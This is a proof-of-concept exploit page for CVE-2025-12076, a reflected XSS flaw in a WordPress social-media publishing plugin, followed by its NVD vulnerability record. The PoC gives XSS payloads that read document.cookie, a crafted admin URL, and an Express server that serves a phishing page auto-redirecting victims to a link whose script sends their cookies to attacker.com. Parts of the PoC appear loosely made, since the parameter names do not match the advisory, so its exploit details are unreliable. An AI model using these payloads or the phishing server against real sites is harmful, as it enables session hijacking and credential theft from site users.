CVE-2025-12076

<!-- CVE-2025-12076 Social Media Auto Publish Reflected XSS PoC --> <!-- This PoC demonstrates the reflected XSS vulnerability via PostMessage parameter --> <!DOCTYPE html> <html> <head> <title>CVE-2025-12076 PoC</title> </head> <body> <h2>CVE-2025-12076 - Social Media Auto Publish XSS PoC</h2> <p>Attack Vector: PostMessage parameter injection</p> <!-- Method 1: PostMessage-based attack --> <h3>Method 1: PostMessage Injection</h3> <pre> &lt;script&gt; window.addEventListener('message', function(e) { // Malicious payload injected via PostMessage var maliciousPayload = '&lt;img src=x onerror="alert(document.cookie)"&gt;'; // Simulating vulnerable endpoint document.getElementById('output').innerHTML = maliciousPayload; }); // Send malicious message window.parent.postMessage('<img src=x onerror="alert(document.cookie)">', '*'); &lt;/script&gt; </pre> <!-- Method 2: URL-based reflected XSS --> <h3>Method 2: URL Parameter Injection</h3> <p>Malicious URL pattern:</p> <code>http://target-site.com/wp-admin/admin.php?page=social-media-auto-publish&param=<script>alert('XSS')</script></code> <!-- Automated exploitation script --> <h3>Method 3: Automated Exploitation</h3> <pre> const express = require('express'); const app = express(); // Generate malicious link const maliciousURL = 'http://target-site.com/wp-admin/admin.php?' + 'page=social-media-auto-publish&' + 'ref=<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>'; // Phishing page that triggers the vulnerability app.get('/attack', (req, res) => { res.send(` &lt;html&gt; &lt;body&gt; &lt;h1&gt;Click to continue...&lt;/h1&gt; &lt;a href="${maliciousURL}"&gt;Click Here&lt;/a&gt; &lt;script&gt; // Auto-redirect after 2 seconds setTimeout(() => { window.location.href = '${maliciousURL}'; }, 2000); &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; `); }); app.listen(8080); </pre> <div id="output"></div> </body> </html>

{"cve": {"id": "CVE-2025-12076", "sourceIdentifier": "[email protected]", "published": "2025-12-13T16:16:45.907", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Social Media Auto Publish plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via PostMessage parameter in all versions up to, and including, 3.6.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3412065%40social-media-auto-publish&new=3412065%40social-media-auto-publish&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/79ae682a-c048-427c-abf8-3ecbccc9c95c?source=cve", "source": "[email protected]"}]}}